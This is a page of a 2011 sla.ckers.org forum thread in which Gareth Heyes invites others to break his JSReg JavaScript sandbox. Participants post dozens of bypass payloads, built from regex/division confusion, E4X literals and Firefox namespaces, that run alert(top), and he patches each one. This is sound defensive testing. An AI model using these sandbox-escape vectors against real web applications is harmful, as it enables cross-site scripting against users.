Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Pages: PreviousFirst...23456789101112...LastNext
Current Page: 7 of 13
Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: March 30, 2011 07:01AM

Nicely done :) and fixed
I'm wondering how many versions you have lol. Is this a windmill war or can I win? Maybe server side regexes with lookbehind would be better or a client side parser

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: LeverOne
Date: March 30, 2011 07:06AM

1.9

[/lo='/];alert(parent.location+'');


Quote

Is this a windmill war or can I win?

You'll never be sure that you have won, even if you say another.

Quote

I'm wondering how many versions you have
If I say "one more", it's much or little?

----------------------
~Veritas~



Edited 1 time(s). Last edit at 03/30/2011 07:33AM by LeverOne.

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: March 30, 2011 08:39AM

Ok one last attempt, I completely rewrite regexes into a JSREG function so /a/ becomes JSREG_R('a')

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: LeverOne
Date: March 30, 2011 08:55AM

1.10

// I hope it's last 1.x

/\\\',"m","/;lo=");alert(parent.location)//";

----------------------
~Veritas~

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: March 30, 2011 09:01AM

Me too, damn I don't want to see 2.0 lol you'll make me cry

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: LeverOne
Date: March 30, 2011 09:09AM

don't worry - group 2.x is a small.

2.1

<>lo="</>;alert(parent.location);""

----------------------
~Veritas~



Edited 1 time(s). Last edit at 03/30/2011 09:10AM by LeverOne.

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: March 30, 2011 10:09AM

E4x strikes again. Ugh. Removed all nodes. If anyone know how to disable e4x with js I'd appreciate it if you let me know.

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: LeverOne
Date: March 30, 2011 10:16AM

2.2

<true true="lo\"/>;alert(parent.location);lo="";

----------------------
~Veritas~



Edited 1 time(s). Last edit at 03/30/2011 10:18AM by LeverOne.

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: March 30, 2011 12:05PM

LOL you don't miss a trick :) and fixed.

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: LeverOne
Date: March 30, 2011 12:25PM

e4x = /(?:<\w*>.*<\/\w*>|<\w+.+\/>)/ <-- Horrible reg. expression. At least 3 ways to bypass it. Until tomorrow! :)

----------------------
~Veritas~



Edited 1 time(s). Last edit at 03/30/2011 12:26PM by LeverOne.

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: March 30, 2011 12:30PM

@LeverOne

Yeah I know :( it was very quick and very dirty lol

Not much better I know:-
e4x = /(?:<\w*>(?:.|[\f\n\r\u000b\u2028\u2029])*<\/\w*>|<\w+(?:.|[\f\n\r\u000b\u2028\u2029])*\/>)/,

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 1 time(s). Last edit at 03/30/2011 12:32PM by Gareth Heyes.

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: Anonymous User
Date: March 30, 2011 06:02PM

@Gareth <{'_'} {'o'}="\"/>,alert(top)//" E4X is a beast :P

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: LeverOne
Date: March 31, 2011 05:08AM

Quote

Yeah I know :( it was very quick and very dirty

Then I will not continue to affect this subject. You need for more time.

a=1;
b=2;
1<a>b</a>;/;


1.11 // the latest 1.x

'/,alert(parent.location),"lo/";

----------------------
~Veritas~

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: March 31, 2011 05:11AM

There's no chance I can match e4x without a parser =) I need to find a way to disable it.

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: March 31, 2011 05:17AM

@LeverOne

Thanks! I broke the syntax check, should detect it now

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: LeverOne
Date: March 31, 2011 07:38AM

1.12 // the latest of the latest

1/
/lo='/,alert(parent.location+'')



My trash vectors is over at this time.

I want to thank

@SW * and @.mario for DPT of JSReg and

@Gareth - for JSReg. :D

* He, btw, forced @Gareth to fix my favorite regexp-bypass in JSReg's revision 118-

//
alert(parent.location)//

----------------------
~Veritas~



Edited 3 time(s). Last edit at 03/31/2011 09:57AM by LeverOne.

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: March 31, 2011 11:57AM

@LeverOne

I wanna thank you for being awesome xD shame you were late to the party though :) JSReg is broken in so many places now! :) a huge challenge to fix thanks

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: SW
Date: March 31, 2011 09:46PM

@LeverOne .. wow you find lots here. :P

@Gareth .. unfortunately I think it will be impossible to fix 100%, and impossible to allow all syntax without a complete parser

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: April 01, 2011 07:40AM

@SW

Yeah looks like that way :(

Anyways I've added e4x detection and now jsreg doesn't allow it. Also fixed lever_one's regex vector

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: LeverOne
Date: April 01, 2011 12:01PM

// sorry, but...

2.3

<È>x='</È>;alert(parent.location+'')

----------------------
~Veritas~



Edited 1 time(s). Last edit at 04/01/2011 01:19PM by LeverOne.

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: April 01, 2011 12:15PM

Ugh. Die E4X. Die.

Thanks and fixed

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: LeverOne
Date: April 01, 2011 01:16PM

2.4.1

<true>lo='</true
>;alert(parent.location+'')

2.4.2

<?true lo='\' ?>;alert(parent.location+'')


1.13

1/ /x='/;alert(parent.location+'');

1/(/x='/);alert(parent.location+'');

0/0/*lo='*/+alert(parent.location+'')


Unfortunately, detecting of regexps still completely vulnerable. @Gareth, please, don't rush with fix!

----------------------
~Veritas~



Edited 8 time(s). Last edit at 04/06/2011 05:00AM by LeverOne.

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: April 28, 2011 11:20AM

Ok I'm back with a bloody nose but still standing (just)
I've completely re-factored the rewriter to handle different states. The regex is handled by a small state machine to fix lax browser parsers and stop bad syntax inside regex character classes. I also detect E4X and prevent it from being executed.

I really appreciate all your help thanks! Please break me again :D this time I should be better prepared for the battle

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: LeverOne
Date: April 28, 2011 03:14PM

1.14

{}/lo='/,alert(parent.location)//'

----------------------
~Veritas~

Options: ReplyQuote
Re: JSReg sandbox challenge
Date: April 29, 2011 06:15AM

Whenever I try to use the "in" or "instanceof" operator I get:
ReferenceError: rewriteinInstanceofOperator is not defined

Ok, I'll add these as well. A more comprehensive list than I tweeted:

Bypasses:

_:/\[/+alert(top)/i
{}/\[/+alert(top)/i
typeof/\[/+alert(top)/i
0?0:/\[/+alert(top)/i
delete/\[/+alert(top)/i
void/\[/+alert(top)/i
with({})/\[/+alert(top)/i
if(1)/\[/+alert(top)/i
while(1)/\[/+alert(top)/i -- Careful with this one
try{/\[/+alert(top)/i}catch(a){}
throw/\[/+alert(top)/i
(function(){return/\[/+alert(top)/i})()
do{/\[/+alert(top)/i}while(1)
switch(0){case 0:/\[/+alert(top)/i}

_:/(]\[)/+alert(top)//]

_:/'/+alert(top)/i

_:<{'x'}>'</x>+alert(top)//'

_:/{/;alert(top)//

_:/\(/;alert(top)//

_:/ /+alert(top)//

Endless loops:

_:/\[/

_:/'/

_:/(]\[)/

_:/ / /**/


The common problem in all these cases is that the first / is interpreted as division instead of regexp. The prefixes are incorrectly interpreted as the first operand of the division.

Overall there has been fantastic improvement on the regexps (as long as they are identified as such)! Great work Gaz!

----------------34----------------
_=/.+?('['_='+_(_)]+).+/,'_='+_(_)



Edited 3 time(s). Last edit at 04/29/2011 11:18AM by Jonas Magazinius.

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: April 29, 2011 03:32PM

Awesome thanks!

Took slightly longer to fix because lever_one pointed out that I need to track statements with his vector. Jonas I forgot to add the left flag for statements for your bugs =) oooops fixed

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: LeverOne
Date: April 29, 2011 05:52PM

1.15 // opened another problem

+{}/ /lo="/,alert(parent.location)//"

1.16 // IE6-8, IE9 (IE7-8 compat. mode)

/[]/,'lo]/,alert(parent.location)//'

/[^]/,'lo]/,alert(parent.location)//'

----------------------
~Veritas~



Edited 1 time(s). Last edit at 04/29/2011 05:53PM by LeverOne.

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: April 30, 2011 08:24AM

@Lever_One

Those IE ones are outstanding! :D that isn't even a bug in JSReg :) IE is doing crazy things there. For the first one I need to track { and } to determine if it's a block statement or object literal.

Update....
and fixed! I check for empty character classes and track opening and closing curlys to determine a block statement or object literal.

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 1 time(s). Last edit at 05/01/2011 07:29PM by Gareth Heyes.

Options: ReplyQuote
Re: JSReg sandbox challenge
Date: May 01, 2011 11:34PM

JSReg is starting to get tight! But FF namespaces and magic strings comes to the rescue..

$='@mozilla.org/js/function';
$::['alert']($::['top']);

$='';[].$::['sort']

And here's a surprising problem:

(function(){this['alert'](this['top'])})()

The same rewriting problem exist with null[''], but is afaik not exploitable.


And we can put it all together:

var _=(function(){return this})()
$='';
_.$::['alert'](_.$::['top'])


I'm still annoyed about the typo "rewriteinInstanceofOperator".

----------------34----------------
_=/.+?('['_='+_(_)]+).+/,'_='+_(_)

Options: ReplyQuote
Re: JSReg sandbox challenge
Date: May 02, 2011 12:36AM

Some more problems of the "old" kind:


true/'/'+alert(top)+''
this/'/'+alert(top)+''
undefined/'/'+alert(top)+''
null/'/'+alert(top)+''
false/'/'+alert(top)+''
Infinity/'/'+alert(top)+''
NaN/'/'+alert(top)+''

----------------34----------------
_=/.+?('['_='+_(_)]+).+/,'_='+_(_)

Options: ReplyQuote
Pages: PreviousFirst...23456789101112...LastNext
Current Page: 7 of 13


Sorry, only registered users may post in this forum.